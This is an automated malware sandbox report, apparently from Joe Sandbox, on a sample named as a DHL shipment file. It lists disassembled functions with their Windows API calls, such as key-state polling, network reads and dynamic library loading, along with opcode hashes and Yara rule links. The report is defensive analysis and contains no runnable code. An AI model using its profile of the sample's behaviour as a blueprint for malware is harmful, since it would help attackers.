Instruction Fuzzy Hash: 0A619B31218241AFD714DF55C594E2BBBE5FF84348F14856CF0998B2A2CB31ED46CBA2

Function 00AC8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AC8BCD
VariantClear.OLEAUT32 ref: 00AC8C3E
VariantClear.OLEAUT32 ref: 00AC8C9D
VariantClear.OLEAUT32(?), ref: 00AC8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AC8D3B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 0e89b09b4a226a3b4adfb1893536732a7f7fe2875f8ff06f7d276a01714a7e35
Instruction ID: 44c82514de0552edf7eeb777ce7ac6a4c6c12f91f98026b80823c3bb0b0ec4f1
Opcode Fuzzy Hash: 0e89b09b4a226a3b4adfb1893536732a7f7fe2875f8ff06f7d276a01714a7e35
Instruction Fuzzy Hash: 8A5169B5A00219EFCB10CF68D884EAAB7F8FF89310B168559E906DB350E734E911CB90

Function 00AD8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AD8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00AD8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AD8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AD8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AD8C5F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: dc21806bb81205abb90948a0f7f08756a5bb1985ac67d34e36000bf33239896a
Instruction ID: a43cbf3e84b8c136f92d2ab58df5587ef8537e0a04fdb01d1b5ad5b03291eafc
Opcode Fuzzy Hash: dc21806bb81205abb90948a0f7f08756a5bb1985ac67d34e36000bf33239896a
Instruction Fuzzy Hash: 6F515C35A10218DFCB04DF65C980AADBBF5FF48314F088499E84AAB362DB35ED51CB90

Function 00AE8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AE8F40
GetProcAddress.KERNEL32(00000000,?), ref: 00AE8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00AE8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00AE9032
FreeLibrary.KERNEL32(00000000), ref: 00AE9052

Part of subcall function 00A7F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00AD1043,?,75B8E610), ref: 00A7F6E6
Part of subcall function 00A7F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00ABFA64,00000000,00000000,?,?,00AD1043,?,75B8E610,?,00ABFA64), ref: 00A7F70D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: f73f3ba71a8dac3d4be7bf1527f18870d9ce9a0a72edcca5e3432cb2dd04dbc2
Instruction ID: 1ad198f0fba7e568505bd748c81a02568cceb5645fc0d6f08ca1402334289f74
Opcode Fuzzy Hash: f73f3ba71a8dac3d4be7bf1527f18870d9ce9a0a72edcca5e3432cb2dd04dbc2
Instruction Fuzzy Hash: 56514C35600245DFC711DF99C5948AEBBF1FF49324B0480A9E80AAB762DB31ED86CF91

Function 00A92051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A920C3
_free.LIBCMT ref: 00A920E3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a64a9fc4ea20f3ca1b7089498e98741da23f56c7ff08890ab567dc1a058aac4b
Instruction ID: d5c6595daba073fa3b0525ee18c38ce28336d4f2c14edb95fd51763502962950
Opcode Fuzzy Hash: a64a9fc4ea20f3ca1b7089498e98741da23f56c7ff08890ab567dc1a058aac4b
Instruction Fuzzy Hash: 5541A132B00200AFCF24DF78C981B5EB7F5EF89314B258569E515EB351DA31AD01CB81

Function 00A7912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A79141
ScreenToClient.USER32(00000000,?), ref: 00A7915E
GetAsyncKeyState.USER32(00000001), ref: 00A79183
GetAsyncKeyState.USER32(00000002), ref: 00A7919D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 08f01cbe8e37d8fd4a71ebb497e98b06c08e2a6dfdb4c56f0efe39273b9641d1
Instruction ID: dbf7a188356b202ed04b989c671e0a5c8859dac52240fa313810b0bf8fe365d9
Opcode Fuzzy Hash: 08f01cbe8e37d8fd4a71ebb497e98b06c08e2a6dfdb4c56f0efe39273b9641d1
Instruction Fuzzy Hash: 1041707190850ABBDF05DFA8DC44BFEB774FB45320F208316E429A72A1C7745954CB61

Function 00AD3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00AD38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00AD3922
TranslateMessage.USER32(?), ref: 00AD394B
DispatchMessageW.USER32(?), ref: 00AD3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AD3966

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 86d78fd807f674d6ce3e7ffe6763caa3d39f32ab39555886157cd5de5bcbf345
Instruction ID: 765c1f2e4c1d528283ac42d1c204d305d36d39397f7d30ecf8b88a7bfcfe5202
Opcode Fuzzy Hash: 86d78fd807f674d6ce3e7ffe6763caa3d39f32ab39555886157cd5de5bcbf345
Instruction Fuzzy Hash: 5531D772504345AEEF35CB759878BBA37A8AB05300F14496BE463832A0E7F49685DB22

Function 00ADCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00ADC21E,00000000), ref: 00ADCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00ADCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00ADC21E,00000000), ref: 00ADCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00ADC21E,00000000), ref: 00ADCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00ADC21E,00000000), ref: 00ADCFF2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: ca4b6a79dbc546a5fcf9deda7b60116017242325dcbcd55e186fd3c6a64874cc
Instruction ID: 97e07a40a61020c2e7b76455445180ac737e08148e5f2a29eafcc24f9501bd25
Opcode Fuzzy Hash: ca4b6a79dbc546a5fcf9deda7b60116017242325dcbcd55e186fd3c6a64874cc
Instruction Fuzzy Hash: 45312C7150430AAFDB20DFE5C984AEBBBF9EB18365B50842EF517D2251DB30AE41DB60

Function 00AC1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AC1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 00AC19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00AC19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 00AC19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00AC19E2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 5d6f5a3b39427c66309d92b7cea8fa5cfad1bafdae00f07c877d109cb03737ce
Instruction ID: 794b1136ce46f9a609014ab42ec7b106f6896c1a1f2f5b8103bce5abfc14fbc6
Opcode Fuzzy Hash: 5d6f5a3b39427c66309d92b7cea8fa5cfad1bafdae00f07c877d109cb03737ce
Instruction Fuzzy Hash: E231AD71A00219EFCB10CFA8CD99BEE7BB5EB06325F114229F921A72D2C7709954CB90

Function 00AE0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00AE0951
GetForegroundWindow.USER32 ref: 00AE0968
GetDC.USER32(00000000), ref: 00AE09A4
GetPixel.GDI32(00000000,?,00000003), ref: 00AE09B0
ReleaseDC.USER32(00000000,00000003), ref: 00AE09E8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2a2062016c4f07a547ada0ce372196e8df2e263e56955a8a8890718f609efc15
Instruction ID: b830e951b4ad49ac9f2733973178f84013765732f4bbf6e7033728c64049146c
Opcode Fuzzy Hash: 2a2062016c4f07a547ada0ce372196e8df2e263e56955a8a8890718f609efc15
Instruction Fuzzy Hash: E2219335600204AFD714EFA6DA88EAEBBF5EF44710F048469F85AD7362DB70AC45CB50

Function 00A9CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A9CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A9CDE9

Part of subcall function 00A93820: RtlAllocateHeap.NTDLL(00000000,?,00B31444,?,00A7FDF5,?,?,00A6A976,00000010,00B31440,00A613FC,?,00A613C6,?,00A61129), ref: 00A93852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A9CE0F
_free.LIBCMT ref: 00A9CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A9CE31

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f813c526dcd7ea46a3f8be9af0fb3f457c344f13dcdd3bc01b0e6a7c1a32b9cb
Instruction ID: 4738e132f9fa7e10a930715e9937bca2ef12147462494657a1b061b19826d19a
Opcode Fuzzy Hash: f813c526dcd7ea46a3f8be9af0fb3f457c344f13dcdd3bc01b0e6a7c1a32b9cb
Instruction Fuzzy Hash: 1B01D472701A157FAB2157F76D88D7BB9ADDEC6BB13150229F906C7200EA608E02C2B0

Function 00A7990F Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A798CC
SetTextColor.GDI32(?,?), ref: 00A798D6
SetBkMode.GDI32(?,00000001), ref: 00A798E9
GetStockObject.GDI32(00000005), ref: 00A798F1
GetWindowLongW.USER32(?,000000EB), ref: 00A79952

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 356c6978a455e29fde6bbdd469a89ea121febc8a780bb4c6bab996e44cef6ac5
Instruction ID: f3fcf9fe985d63aa633a3f0212203a83c28e63fc687058dfb53ce18d48c66f07
Opcode Fuzzy Hash: 356c6978a455e29fde6bbdd469a89ea121febc8a780bb4c6bab996e44cef6ac5
Instruction Fuzzy Hash: A621273218A2549FC712CFA5EC59BBB7B74EF13321718859BF5468B1B2CB214852CB51

Function 00A79639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A79693
SelectObject.GDI32(?,00000000), ref: 00A796A2
BeginPath.GDI32(?), ref: 00A796B9
SelectObject.GDI32(?,00000000), ref: 00A796E2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b52986b6744ccb58883c4cf40ee30549cc31bd8ea14946a01e4f258344222518
Instruction ID: e358767b6af95c4871a2a66631efe3e640813cb2a50ceb9432eed98b02226166
Opcode Fuzzy Hash: b52986b6744ccb58883c4cf40ee30549cc31bd8ea14946a01e4f258344222518
Instruction Fuzzy Hash: 11217F31802305EBDB11DFA9DD14BAE3BBCBB40725F208716F414A71A0DB709892CBA4

Function 00AC5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00AC5726
_memcmp.LIBVCRUNTIME ref: 00AC5744
_memcmp.LIBVCRUNTIME ref: 00AC5757
_memcmp.LIBVCRUNTIME ref: 00AC576F
_memcmp.LIBVCRUNTIME ref: 00AC5787

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b43e428634f96801d6f223d1a8687e768a38cf82bdcd379e125b0cfed08bb6d4
Instruction ID: 346963b74331e06f172c66029f6e5c28ced3ecd2079f4826582d1f4448bcc593
Opcode Fuzzy Hash: b43e428634f96801d6f223d1a8687e768a38cf82bdcd379e125b0cfed08bb6d4
Instruction Fuzzy Hash: 9201B576A41619BFD2186624DE82FBB735CEF21394F014828FE04AE241F760FDD183A4

Function 00A92DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00A8F2DE,00A93863,00B31444,?,00A7FDF5,?,?,00A6A976,00000010,00B31440,00A613FC,?,00A613C6), ref: 00A92DFD
_free.LIBCMT ref: 00A92E32
_free.LIBCMT ref: 00A92E59
SetLastError.KERNEL32(00000000,00A61129), ref: 00A92E66
SetLastError.KERNEL32(00000000,00A61129), ref: 00A92E6F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: ca674f1946d5e20d9aeed551d369fe86e75330ed51df3dc98fb2ea7790ce4d69
Instruction ID: 758271cf4c4ed6003ebb867fe9af102d411f1e64728ebc6915792b0279d49e6b
Opcode Fuzzy Hash: ca674f1946d5e20d9aeed551d369fe86e75330ed51df3dc98fb2ea7790ce4d69
Instruction Fuzzy Hash: EA01F9327056007BCE22A7B56DC6F2B2DEDAFD13F5B250124F415A2192EE648C024360

Function 00AC000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?,?,00AC035E), ref: 00AC002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?), ref: 00AC0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?), ref: 00AC0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?), ref: 00AC0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?), ref: 00AC0070

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c28f6d98c56e81f4936e4bd1374ecdb8879f56878b861eda9b3b64471c48727d
Instruction ID: 5d6094e2d0768fbf6c8c4b7b2256d958f655befcf511623b3ba2772fa0207b53
Opcode Fuzzy Hash: c28f6d98c56e81f4936e4bd1374ecdb8879f56878b861eda9b3b64471c48727d
Instruction Fuzzy Hash: 09018B76600208FFDB208FAADD04FAA7AADEB447A2F164128F905D6210E771DD41CBA0

Function 00ACE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00ACE997
QueryPerformanceFrequency.KERNEL32(?), ref: 00ACE9A5
Sleep.KERNEL32(00000000), ref: 00ACE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00ACE9B7
Sleep.KERNEL32 ref: 00ACE9F3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 4d2ba03b858ce2a800b554dbd9d74ccfbd30ff906d8b40991350b0b075f16d65
Instruction ID: babf4b793118232b4663714cd276a93a5e86a9816d0af89b42e6df85ad5da541
Opcode Fuzzy Hash: 4d2ba03b858ce2a800b554dbd9d74ccfbd30ff906d8b40991350b0b075f16d65
Instruction Fuzzy Hash: B001F731C0152D9BCF00EBE6DD59AEDFB78BB09711F01465AE502B2141CB309565C765

Function 00AC10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC114D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

